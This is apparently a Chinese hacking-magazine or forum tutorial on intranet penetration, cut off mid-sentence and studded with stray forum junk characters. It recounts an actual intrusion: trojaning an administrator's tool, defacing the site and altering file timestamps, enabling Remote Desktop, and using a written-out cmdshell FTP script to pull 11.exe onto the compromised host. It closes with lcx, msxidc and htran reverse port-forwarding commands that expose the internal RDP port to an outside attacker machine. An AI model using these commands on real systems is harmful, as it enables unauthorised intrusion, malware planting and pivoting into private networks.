经常在一些BBS里和一些杂志里看到,渗透XX网站,其实就是拿了扔了一个WEBSHELL在上面,严格来说这根本算不上渗透。因为当你进了XX内网面对N多的机器的时候,才知道,内网是多么的庞大。下面我们先来看两张内网的拓扑结构图,图1,图2所示。如果有的朋友现在还不了解路由器和交换机等什么意思,那应该好好补习一下了。这里在说一下什么叫内网,可能有的朋友认192.168.1.x这样的形式就是内网,前段时间QQ上一朋友挂出一台机器,告诉我有内网,我问他怎么判断的,他说执行ipconfig /all的时候看见内网地址了,其实这样判断太过草率,比如说我为了安全,我自己买了一个路由器那么在我的电脑执行ipconfig /all的时候IP地址也是内网,其实我有内网吗?是没有的。7 q) \6 i1 N2 Q' k / U/ [' w" p5 c: y; ] 在渗透内网之前我们先来了解一下局域网常见的拓扑结构,网络中的计算机等设备要实现互联,就需要以一定的结构方式进行连接,这种连接方式就叫做"拓扑结构",通俗地讲这些网络设备如何连接在一起的。目前常见的网络拓扑结构主要有以下四大类:1、星型结构,2、环型结构,3、总线型结构,4、星型和总线型结合的复合型结构。因为文章是讨论渗透内网的,所以每种的详细介绍,我就不列出来了,大家简单了解下就可以了,有兴趣的可以每一种都百度下。$ f; Q7 u% \" [1 U
可能刚入门的朋友不是很了解为什么内网而我们还能访问到呢,现在很多服务器都是用了硬件防火墙作的映射,也就是说他的所有服务器其实都在防火墙以后并且没有外网IP,可能有人会说,没有外网IP那我们访问它网站用的IP是什么呢?如果使用硬件防火墙配置过这种环境过朋友就明白了,这是现在很多包括国内大公司流行的NAT配置方法,这样相对来说比较安全,这样就需要我们在渗透的时候做端口映射。 # B$ x5 ?) S; n6 `4 A$ G, J 下面我把以前入侵渗透的几次内网过程并把一些思路,一些高手们的渗透经验,和一些用到或没用到的工具都综合的说一下。首先是通过脚本漏洞获得了一个WEBSHELL,服务器开的端口有21和80,并没有开过多的端口,没有装SU,pcAnywhere等第三方软件,wscript.shell为真,上传CMD能执行一些简单的命令,其他脚本木马权限一样,这台服务器上面就两个站,目录权限不是很严,发现D盘下有一个字符替换器,如图3所示。直接把下回本地看看是什么东东,原来是一个查找字符的工具,如图4所示。
莫非这站以前让人搞过,管理员用来查找被改文件的,试了一下可以改名,如图5,那么好办了,我直接捆了一个木马在上面,把这个删掉,等着管理员上线吧,等了两天管理员还是没有上线,这么等下去也不是办法,只好把首页涂了,告诉他网站有漏洞,已被人植入木马,请查找木马之类的,并修改了几个重要文件的时间,果然管理员上线了。如图6。
执行ipconfig /all果然有内网IP,图7。既然没开终端太不方便,我直接帮它开了吧,后来这台机器我又做了VPN,开3389可以用手工和工具都可以的,这里带给大家二个开3389的工具,都还比较不错,一个是火狐的开3389的工具,另一个是特南克斯,这里我用的是特南克斯的,至于怎么把程序传到肉鸡上办法很多,可以用远程程序直接传,也可以在本机架FTP服务器,用到20cn的FTP服务器,图8。设置好用户和密码后cmdshell里执行: 4 P% B" V' M9 C echo o 你架设FTP的IP>ftp.txt& \) c' ^( \: S+ f: z3 f
echo hacklu>>ftp.txt //写入ftp.txt用户名 ! X' {7 D" x' y( n echo 123456>>ftp.txt //写入ftp.txt密码 8 E6 D8 J' ^2 g p echo bin>>ftp.txt //二进制方式转输
echo get 11.exe>>ftp.txt //将11.exe下载到肉鸡
echo bye>>ftp.txt //断开FTP - |2 d& ?/ N- ?5 ~" Q* k type ftp.txt //查看写入是否有错误
ftp -s:ftp.txt //执行FTP.TXT里的内容0 E/ J$ r& {& ~5 C' S) R8 _0 J# u 9 B/ h5 c8 t- p9 u7 p del ftp.txt //删除ftp.txt V& u% Z& {3 D. n) O& R
这样我们就可以把11.exe下载到肉鸡运行就可以了,也可以用0803期杂志提到的VBS工具,适合不超过300KB的程序。把EXE转成BAT在上传,工具运行好会自动判断是2000系统或者2003系统,2000系统则自己重启,也可以自定义终端端口,运行结果如图9所示。
在执行netstat -an发现3389开放,当然这样直接连是连接不上的,因为我们外界是无法直接访问到内部机器的,但可以让内网机器来访问我们,比如现在流行的反弹木马,这样就需要我们做端口映射,说到端口映射工具当然代表作就是LCX写的工具了,首先在本机执行lcx -listen 99 9833,在肉鸡上执行lcx -slave 123.114.120.115 127.0.0.1 99 3389,意思是在本机监听99和9833端口,把99端口数据转到9833上面,然后把肉鸡的3389端口数据转到本机的99端口上,然后就可以拿连接器连接本地的9833端口了,如图10所示。0 }4 [5 E/ ^6 o& j* p
而奇怪的是这次却没有连上,那就用下教主的高级内网渗透工具Paris,工具其他功能不多说了,只说下端口映射的功能,传msxidc和vVXDc.dll到目标内网机器,在目标机器执行:msxidc -l127.0.0.1 -p3389 -m82 -s61.149.230.28 -r22,在自己机器或者有公网IP的肉鸡:MAPServer.EXE -p22,这时候只要连接本机的或者公网IP肉鸡的22端口就可以了,在说一款比较不错的工具,htran.exe,能开启Socks5服务,但我们只说端口映射,命令:在公网肉鸡监听(临听任意两个端口):htran -p -listen 119 120,在内网的机器执行:htran -p -slave 公网肉鸡IP 119 127.0.0.1 3389,这样是把这个内网肉鸡的3389转发到公 |